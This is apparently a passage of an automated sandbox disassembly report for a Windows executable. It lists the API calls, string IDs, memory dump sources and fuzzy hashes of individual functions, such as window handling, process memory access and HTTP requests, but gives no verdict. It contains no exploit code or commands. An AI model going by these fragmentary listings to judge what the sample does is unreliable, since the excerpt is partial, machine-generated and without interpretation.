                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
                                                                                          • DeleteObject.GDI32(?), ref: 0045564E
                                                                                          • DeleteObject.GDI32(?), ref: 0045565C
                                                                                          • DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
                                                                                          • DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Destroy$DeleteObjectWindow$Icon
                                                                                          • String ID:
                                                                                          • API String ID: 4023252218-0
                                                                                          • Opcode ID: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                          • Instruction ID: d1816f9fa450f538fb043821254e2bd2cfb9ade9207d957631f6d0e9d50691b6
                                                                                          • Opcode Fuzzy Hash: 187bd120907745c88baacffad0920a9106e1cca1ea6db424662e0a83cd01c53e
                                                                                          • Instruction Fuzzy Hash: 05015E70300605ABCB20DF65D9D4B2B77A8BF14712B50452AFD04D7346EB38EC48CB69
                                                                                          APIs
                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 00460342
                                                                                          • GetWindowTextW.USER32(00000000,00000100,00000100), ref: 00460357
                                                                                          • MessageBeep.USER32(00000000), ref: 0046036D
• KillTimer.USER32(?,0000040A), ref: 00460392
• EndDialog.USER32(?,00000001), ref: 004603AB
Memory Dump Source
• Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
Similarity
• API ID: BeepDialogItemKillMessageTextTimerWindow
• String ID:
• API String ID: 3741023627-0
APIs
• SendMessageW.USER32(?,00001101,00000000,?), ref: 00455514
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Similarity
• API ID: DeleteDestroyObject$IconMessageSendWindow
• String ID:
• API String ID: 1489400265-0
APIs
  • Part of subcall function 0043343D: InvalidateRect.USER32(?,00000000,00000001), ref: 004334BE
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455640
• DeleteObject.GDI32(?), ref: 0045564E
• DeleteObject.GDI32(?), ref: 0045565C
• DestroyIcon.USER32(?,?,?,?,?), ref: 0045566A
• DestroyWindow.USER32(?,?,?,?,?), ref: 00455678
Similarity
• API ID: Destroy$DeleteObjectWindow$IconInvalidateRect
• String ID:
• API String ID: 1042038666-0
APIs
Similarity
• API ID: Path$ObjectStroke$DeleteFillSelect
• String ID:
• API String ID: 2625713937-0
APIs
  • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
• ___set_flsgetvalue.LIBCMT ref: 004140E1
  • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
  • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
  • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
• ___fls_getvalue@4.LIBCMT ref: 004140EC
  • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
• ___fls_setvalue@8.LIBCMT ref: 004140FF
  • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
• GetLastError.KERNEL32(00000000,?,00000000), ref: 00414108
• ExitThread.KERNEL32 ref: 0041410F
• GetCurrentThreadId.KERNEL32 ref: 00414115
• __freefls@4.LIBCMT ref: 00414135
• __IsNonwritableInCurrentImage.LIBCMT ref: 00414148
Similarity
• API ID: Value$CurrentThread__decode_pointer$ErrorExitImageLastNonwritable___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
• String ID:
• API String ID: 132634196-0
APIs
• __IsNonwritableInCurrentImage.LIBCMT ref: 00415610
  • Part of subcall function 00418540: __FindPESection.LIBCMT ref: 0041859B
• __getptd_noexit.LIBCMT ref: 00415620
• CloseHandle.KERNEL32(?,?,0041566B), ref: 00415634
• __freeptd.LIBCMT ref: 0041563B
• ExitThread.KERNEL32 ref: 00415643
Similarity
• API ID: CloseCurrentExitFindHandleImageNonwritableSectionThread__freeptd__getptd_noexit
• String ID:
• API String ID: 3798957060-0
APIs
  • Part of subcall function 00411A35: _doexit.LIBCMT ref: 00411A41
• ___set_flsgetvalue.LIBCMT ref: 00415690
  • Part of subcall function 00416A84: TlsGetValue.KERNEL32(00411739,00416C10,?,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416A8D
  • Part of subcall function 00416A84: __decode_pointer.LIBCMT ref: 00416A9F
  • Part of subcall function 00416A84: TlsSetValue.KERNEL32(00000000,00411739,00417F28,00413979,?,?,00411739,?,00401C0B), ref: 00416AAE
• ___fls_getvalue@4.LIBCMT ref: 0041569B
  • Part of subcall function 00416A64: TlsGetValue.KERNEL32(?,?,004140F1,00000000), ref: 00416A72
• ___fls_setvalue@8.LIBCMT ref: 004156AD
  • Part of subcall function 00416AB8: __decode_pointer.LIBCMT ref: 00416AC9
• GetLastError.KERNEL32(00000000,?,00000000), ref: 004156B6
• ExitThread.KERNEL32 ref: 004156BD
• __freefls@4.LIBCMT ref: 004156D9
• __IsNonwritableInCurrentImage.LIBCMT ref: 004156EC
Similarity
• API ID: Value$__decode_pointer$CurrentErrorExitImageLastNonwritableThread___fls_getvalue@4___fls_setvalue@8___set_flsgetvalue__freefls@4_doexit
• String ID:
• API String ID: 1537469427-0
Strings
Similarity
• API ID: _malloc
• String ID: Default$|k
• API String ID: 1579825452-2254895183
APIs
Strings
Similarity
• API ID: _memcmp
• String ID: '$[$h
• API String ID: 2931989736-1224472061
APIs
Strings
                                                                                          Similarity
                                                                                          • API ID: _strncmp
                                                                                          • String ID: >$R$U
                                                                                          • API String ID: 909875538-1924298640
                                                                                          • Opcode ID: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
                                                                                          • Instruction ID: f6794502b7c89560a677b30a08de70cb8bc1b17d125f16f135907c58c8460d8d
                                                                                          • Opcode Fuzzy Hash: f9ebc198af2ab7ab0819517e001d9756788144751dce64bc403378e3fae079f3
                                                                                          • Instruction Fuzzy Hash: 46E19C745083818FEB25CF29C49076BBBE1EFD9304F28496EE89587381D378E849CB56
                                                                                          APIs
                                                                                            • Part of subcall function 00442C52: _wcslen.LIBCMT ref: 00442C82
                                                                                          • CoInitialize.OLE32(00000000), ref: 0046CE18
                                                                                          • CoCreateInstance.OLE32(00482A50,00000000,00000001,004828B0,?), ref: 0046CE31
                                                                                          • CoUninitialize.OLE32 ref: 0046CE50
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CreateInitializeInstanceUninitialize_wcslen
                                                                                          • String ID: .lnk
                                                                                          • API String ID: 886957087-24824748
                                                                                          • Opcode ID: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                                          • Instruction ID: 09ec1e36491b9dee8eccbfa157b0fc1a83632a56aae6c10d58f94140378ad3aa
                                                                                          • Opcode Fuzzy Hash: cf95cfa125c39178dc1728bd48ca6ee468afe444b27fb378bb5b47a8cf5920ff
                                                                                          • Instruction Fuzzy Hash: D3A1ABB5A042019FC704EF64C980E6BB7E9EF88714F14895EF8849B392D735EC45CBA6
                                                                                          Strings
                                                                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00469C37
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: _wcslen
                                                                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                                                                          • API String ID: 176396367-557222456
                                                                                          • Opcode ID: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                                          • Instruction ID: 5ec49088f7a0f5eff408c40ec761cfb1cab3d77d8e9f1d748350f88cc39ab646
                                                                                          • Opcode Fuzzy Hash: 6ed3ee7040cf52f7c8cf58c24b37417f7719ae2cfab6dfb5b0d2deafceea8a2b
                                                                                          • Instruction Fuzzy Hash: 2C818F715183009FC310EF65C88186BB7E8AF85714F408A2FF5959B2A2E778ED45CB9B
                                                                                          APIs
                                                                                            • Part of subcall function 0041171A: _malloc.LIBCMT ref: 00411734
                                                                                          • VariantInit.OLEAUT32(00000000), ref: 0042D2E0
                                                                                          • VariantCopy.OLEAUT32(?,?), ref: 0042D2EE
                                                                                          • VariantClear.OLEAUT32(00000000), ref: 0042D2FF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Variant$ClearCopyInit_malloc
                                                                                          • String ID: 4RH
                                                                                          • API String ID: 2981388473-749298218
                                                                                          • Opcode ID: 33330a00173044044b3d4ba47678e2926b365edad981b8cf660d8c4061008482
                                                                                          • Instruction ID: 2430bd0654d197d786bc988f6f01769df72c779a088326c60667d263ff95ce9f
                                                                                          • Opcode Fuzzy Hash: 33330a00173044044b3d4ba47678e2926b365edad981b8cf660d8c4061008482
                                                                                          • Instruction Fuzzy Hash: CC913874A083519FC720CF29D480A1AB7E1FF89304F64892EE999DB351D774EC85CB96
                                                                                          APIs
                                                                                            • Part of subcall function 0040FFF0: _wcslen.LIBCMT ref: 0040FFF2
                                                                                            • Part of subcall function 0040FFF0: _wcscpy.LIBCMT ref: 00410012
                                                                                          • __wcsnicmp.LIBCMT ref: 0046681A
                                                                                          • WNetUseConnectionW.MPR(00000000,?,00000000,?,00000000,?,00000000,?), ref: 004668B9
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Connection__wcsnicmp_wcscpy_wcslen
                                                                                          • String ID: LPT$HH
                                                                                          • API String ID: 3035604524-2728063697
                                                                                          • Opcode ID: 4168d29b7d0848dc605f9ce781fdb6688c60699af114ee795911c582be7b9077
                                                                                          • Instruction ID: 32c7950bcbaa764ae6d62266904c1b9f72d26d84b6ae022b5f72856ccecd4d84
                                                                                          • Opcode Fuzzy Hash: 4168d29b7d0848dc605f9ce781fdb6688c60699af114ee795911c582be7b9077
                                                                                          • Instruction Fuzzy Hash: 2151D5B16043009FC720EF65C881B1BB7E5AF85704F11491EFA859B382E779ED49C79A
                                                                                          APIs
                                                                                            • Part of subcall function 004374AF: WriteProcessMemory.KERNEL32(?,?,00000000,00000000,00000000,?,00461142,?), ref: 004374E2
                                                                                          • SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00438AB8
                                                                                            • Part of subcall function 00437472: ReadProcessMemory.KERNEL32(?,00000000,00000000,?,00000000,00000000,00460C33,?,00000000,?,00000202), ref: 004374A5
                                                                                          • SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00438B2F
                                                                                          • SendMessageW.USER32(00000000,00001111,00000000,00000000), ref: 00438BAF
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$MemoryProcess$ReadWrite
                                                                                          • String ID: @
                                                                                          • API String ID: 4055202900-2766056989
                                                                                          • Opcode ID: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                                          • Instruction ID: 682097a2b5231093ce935cfc9f6f49684b756042c0be5430c67da702d62f7190
                                                                                          • Opcode Fuzzy Hash: 95f302c56ad406a71ba46a757bfca5032ac46bd5be6e99a0861c43b96ce9d769
                                                                                          • Instruction Fuzzy Hash: E6518FB2208304ABD310DB64CC81FEFB7A9EFC9714F04591EFA8597181D678F9498B66
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: CrackInternet_memset_wcslen
                                                                                          • String ID: |
                                                                                          • API String ID: 915713708-2343686810
                                                                                          • Opcode ID: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                                          • Instruction ID: 59fb16093b155e5aebf0565036b17e76eaaa1a90c891d08183ce313382d628e9
                                                                                          • Opcode Fuzzy Hash: 49a329c21d3e2b60aa9c34259f3774bde857317d5b4f329263fe64f76368b085
                                                                                          • Instruction Fuzzy Hash: AE417EB2754301ABD204EF69DC81B9BF7E8FB88714F00052EF64593290DB75E909CBA6
                                                                                          APIs
                                                                                          • InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 0044A7FE
                                                                                          • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 0044A851
                                                                                          • HttpQueryInfoW.WININET ref: 0044A892
                                                                                            • Part of subcall function 0044286A: GetLastError.KERNEL32(00000000,0044AA07,?,00000000,00000000,00000001,?,?), ref: 00442880
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Http$ErrorInfoInternetLastOpenQueryRequestSend
                                                                                          • String ID:
                                                                                          • API String ID: 3705125965-3916222277
                                                                                          • Opcode ID: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                                          • Instruction ID: e2ea4e726a01332d61d4ddbc0b4be6fd5f15ca60b5c099a75bcf819f780d651a
                                                                                          • Opcode Fuzzy Hash: 978b0a3adb57e12b693652f0a59e9f67067917ae502be6042813f4078819ed5c
                                                                                          • Instruction Fuzzy Hash: F431C6B56813416BE320EB16DC42F9FB7E8EFD9714F00091FF65057281D7A8A50D876A
                                                                                          APIs
                                                                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013), ref: 00450A84
                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00450AA2
                                                                                          • SetWindowLongW.USER32(00000000,000000F0,00000000), ref: 00450AB3
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: Window$Long
                                                                                          • String ID: SysTreeView32
                                                                                          • API String ID: 847901565-1698111956
                                                                                          • Opcode ID: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                                          • Instruction ID: 1ec52148e0427fd314aa46f8515fbaae5756f8dde681787cc4d1a4a364837cef
                                                                                          • Opcode Fuzzy Hash: 8beaa76caf08e9d8622144d4cb1fe8de975b1c4a0fa94bb7914df260c0b4a9df
                                                                                          • Instruction Fuzzy Hash: 9831E670244301AFE710DB64CC84B6BB3E8EF98325F104A1EF9A5932D1D7B8AD85CB25
                                                                                          APIs
                                                                                          • DestroyWindow.USER32(00000000,004A83D8,00000000,?,?), ref: 00450C60
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: DestroyWindow
                                                                                          • String ID: msctls_updown32
                                                                                          • API String ID: 3375834691-2298589950
                                                                                          • Opcode ID: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                                          • Instruction ID: 6a1e1189e42626fde14bc74b9d87f1f450c181bb0fe7a510af516aef360d3f61
                                                                                          • Opcode Fuzzy Hash: 2a2b7300f3f0896f723b2acc27284ae87319393b418436251cb0663837fc8f9c
                                                                                          • Instruction Fuzzy Hash: CE31A279300201AFD624DF54DC81F5B73A9EB9A714F20451EF640AB382C7B4AC4ACB6A
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,00000180,00000000,?), ref: 0045122A
                                                                                          • SendMessageW.USER32(00000000,00000186,00000000,00000000), ref: 00451238
                                                                                          • MoveWindow.USER32(?,?,00000000,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 0045125D
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: MessageSend$MoveWindow
                                                                                          • String ID: Listbox
                                                                                          • API String ID: 3315199576-2633736733
                                                                                          • Opcode ID: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                          • Instruction ID: bfe1e9b3800f224edd0053b2d0d87a77da448e7bf5b17050dc61905274d7532a
                                                                                          • Opcode Fuzzy Hash: ec94c338bdc408a6213732be15a93177a4dce0f95fa1299e59073e0341a0244e
                                                                                          • Instruction Fuzzy Hash: E421D3712043047BE6209A65DC81F6BB3E8EBCD735F104B1EFA60A72D1C675EC458729
                                                                                          APIs
                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D243
                                                                                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D2C7
                                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D30C
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorMode$InformationVolume
                                                                                          • String ID: HH
                                                                                          • API String ID: 2507767853-2761332787
                                                                                          • Opcode ID: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                          • Instruction ID: 4a708fd112bc3492f79fb502a293ca5b83a6a9b53d4ab80d782c21126568c1ab
                                                                                          • Opcode Fuzzy Hash: 10a78899cac0a24ca5bd241ff5c46140465ea67f957306f93882c0fc43b3d187
                                                                                          • Instruction Fuzzy Hash: 622148756083019FC310EF55D944A6BB7E4FF88704F40882EFA45972A2D774E909CB5A
                                                                                          APIs
                                                                                          • SetErrorMode.KERNEL32(00000001), ref: 0045D44A
                                                                                          • GetVolumeInformationW.KERNEL32(?,?,000000FF,?,?,?,?,000000FF,?), ref: 0045D4CE
                                                                                          • SetErrorMode.KERNEL32(?,00000001,00000000), ref: 0045D502
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000000.00000002.1424962189.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425020484.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425039132.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                                                                          • Associated: 00000000.00000002.1425071401.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_400000_XhAQ0Rk63O.jbxd
                                                                                          Similarity
                                                                                          • API ID: ErrorMode$InformationVolume
                                                                                          • String ID: HH
                                                                                          • API String ID: 2507767853-2761332787
                                                                                          • Opcode ID: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                          • Instruction ID: 8e4373afe1f51974a95c06a3ae407364d3098df30383bdf5f9e51316f0e0b5c8
                                                                                          • Opcode Fuzzy Hash: a403ffe69dae12f4374470e721856d745e9457d8bcd1b2c0f65575075c8e6c3b
                                                                                          • Instruction Fuzzy Hash: 902137756083019FC314EF55D944A5AB7E8FF88710F40882EFA49972A2D778E909CB9A
                                                                                          APIs
                                                                                          • SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00450D74
                                                                                          • SendMessageW.USER32(00000000,00000406,00000000,00640000), ref: 00450D8A
                                                                                          • SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00450D98
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1424977449.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
